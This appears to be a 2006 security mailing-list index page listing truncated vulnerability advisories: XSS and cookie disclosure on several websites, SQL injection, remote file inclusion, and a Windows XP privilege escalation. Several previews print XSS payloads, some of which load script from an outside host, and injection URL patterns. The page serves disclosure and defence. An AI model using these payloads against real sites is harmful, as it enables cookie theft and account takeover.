|
|
Colapse all |
Post message
Wireclub.com - XSS & cookie disclosure 2006-06-12 luny youfucktard com Wireclub.com Homepage: http://www.wireclub.com Effected files: input boxes of editing a profile XSS Vuln with no filter evasion at all: <IMG SRC=javascript:alert('XSS')> We notice that when trying to put a url in the Open line about yourself input box, we get the msg "no urls allowe [ more ] [ reply ] Windows XP Task Scheduler Local Privilege Escalation (Advisory) 2006-06-12 zipk0der (zipk0der pandora-security com) =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- =-=-=-= = Advisory: Windows XP Task Scheduler Local Privilege Escalation = = Author: Daniel Hückmann (zipk0der) zipk0der (at) pandora-security (dot) com [email concealed] = = Released at: http://www.pandora-security.com [ more ] [ reply ] sorry i wrong something, this is original AWF CMS 1.11 adv 2006-06-11 Federico Fazzi (federico autistici org) this is ok: ----------------------------------------------------- Advisory id: FSA:011 Author: Federico Fazzi Date: 11/06/2006, 22:30 Sinthesis: AWF CMS 1.11, Remote command execution Type: high Product: http://www.awf-cms.org/ Patch: unavailable ------------------------------------- [ more ] [ reply ] Opengaia.com - XSS Vuln & Session Include 2006-06-11 luny youfucktard com Opengaia.com Homepage: http://www.opengaia.com Effected files: my_page.php module.php editing your profile the search input box adding a diary/blog ------------------------------------ Just like in onlinenode.com's vulnerabilities, it seems this site filters data just about the sam [ more ] [ reply ] [KAPDA::48]CopperminePhotoGallery1.4.8~ addhit() function~ SQLinjection attack 2006-06-11 addmimistrator gmail com [ORIGINAL ADVISORY:] http://myimei.com/security/2006-06-11/copperminephotogallery148-addhit-f unction-sqlinjection-attack.html HTTP://KAPDA.IR ??-Summary??- Software: CPG Coppermine Photo Gallery Software?s Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.8.stable Class: Remote [ more ] [ reply ] Foing (manage_songs.php) Remote File Inclusion[phpBB] 2006-06-12 darkfire f4kelive zzn com # Foing (manage_songs.php) Remote File Inclusion[phpBB] # # Contact : email: darkfire (at) f4kelive.zzn (dot) com [email concealed] & msn: darkfire (at) darkfire-br (dot) com [email concealed] # Risk : High # Class : Remote # Script : Foing # Version : 0.7.0 e previous --------------------------------------------------------------------- Vulne [ more ] [ reply ] Myscrapbook v3.1 - XSS 2006-06-11 luny youfucktard com Myscrapbook Homepage: http://www.pixytrix.com/myscrapbook/ Effected files: singlepage.php ------------------------------------------- Full path error with viewing most files in the txt-db-api dir: Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or directory in [ more ] [ reply ] CS-Forum <= 0.81 Cross Site Scripting, SQL Injection, Full Path Disclosure 2006-06-11 gmdarkfig gmail com Cross Site Scripting ******************** http://[...]/read.php?msg_result=[XSS] http://[...]/read.php?rep_titre=">[XSS] Cookies: CSForum_nom=">[XSS]; CSForum_mail=">[XSS]; CSForum_url=">[XSS] SQL Injection ************* http://[...]/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT] http://[... [ more ] [ reply ] Wanderlist.com - XSS vuln with sessions disclosure 2006-06-11 luny youfucktard com Wanderlist.com Homepage: http://www.wanderlist.com search.cgi Search box input adding a item to a list Search.cgi XSS vuln with sessions disclosure: By putting a few ending opening tags with quotes beforeand after,we are able create a XSS example: ">">">'<SCRIPT SRC=http://youfucktar [ more ] [ reply ] tempnam() Bypass unique file name PHP 5.1.4 2006-06-11 cxib securityreason com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [tempnam() Bypass unique file name PHP 5.1.4] Author: Maksymilian Arciemowicz (cXIb8O3) Date: - -Written: 22.5.2006 - -Public: 11.6.2006 from SECURITYREASON.COM CVE-2006-2660 - --- 0.Description --- PHP is an HTML-embedded scripting langu [ more ] [ reply ] Flork.com 2006-06-10 luny youfucktard com Flork.com Effected files: input boxes when creating a new user XSS Vulnerabiliy: We notice by adding empty tags and endingand beginning brackets we can bypass the filter of the flork.com signup. For PoC try adding either one of the below codes in as your name: ">'>'><iframe src=http:// [ more ] [ reply ] vbulletin.com Multiple XSS Vulnerabilities 2006-06-10 chris splices org Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the attacker to gain sensitive credentials for authentication himself as a user on the forum and site. The first problem lies in the the site's Sales Form for opening an issue ticket. Proper sanitation of variables passed v [ more ] [ reply ] Hotbot.com - XSS vulnerability in search engine 2006-06-10 admin majorsecurity de Hotbot.com - XSS vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 10th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz http://www [ more ] [ reply ] Lycos.com - XSS vulnerability 2006-06-10 admin majorsecurity de Lycos.com - XSS vulnerability ---------------------------------------------- Type: Cross site scripting Date: June, 10th 2006 ---------------------------------------------- Credits: ---------------------------------------------- Discovered by: David "Aesthetico" Vieira-Kurz http://www. [ more ] [ reply ] [ GLSA 200606-12 ] Mozilla Firefox: Multiple vulnerabilities 2006-06-11 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Secunia Research: MyBB "domecode()" PHP Code ExecutionVulnerability 2006-06-12 Secunia Research (vuln-remove secunia com) [ GLSA 200606-11 ] JPEG library: Denial of Service 2006-06-11 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Mydeardiary.com - XSS 2006-06-12 luny youfucktard com Mydeardiary.com Homepage: http://www.mydeardiary.com Effected files: search input boxes Adding new diary entries -------------------------------------- We create our XSS example by ending quotes with tags before and after: ">">">'><SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT><"< [ more ] [ reply ] igloo DoubleSpeak v 0.1 Multiple remote file inclusion 2006-06-11 aminrayden yahoo com igloo DoubleSpeak v 0.1 Multiple remote file inclusion ----------------------------------------------------- Aria-security.com advisory Bug Discovered by R@1D3N (amin emami) Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt email:AminRayden (at) yahoo (dot) com [email concealed] Date:12/06/2006 [ more ] [ reply ] Call For Papers - No cON Name 2006 Edition Spain 2006-06-11 Jose Nicolas Castellano (jncastellano noconname org) Hello, This is for you... Thanks for reading... ************************************************* * No cON Name 2006 Congress === Call For Papers * ************************************************* <> http://www.noconname.org/congreso2006.php <> <> September: 28th, 29th and 30th. <> ** What is [ more ] [ reply ] [ GLSA 200606-10 ] Cscope: Many buffer overflows 2006-06-11 Sune Kloppenborg Jeppesen (jaervosz gentoo org) |
|
Privacy Statement |
Homepage:
http://www.virtualtourist.com
Effected files:
Input boxes of your profile
search destination input box
-------------------------------------------------------
XSS vulnerability with cookie disclosure:
Under the section of "Tell others a little about y
[ more ] [ reply ]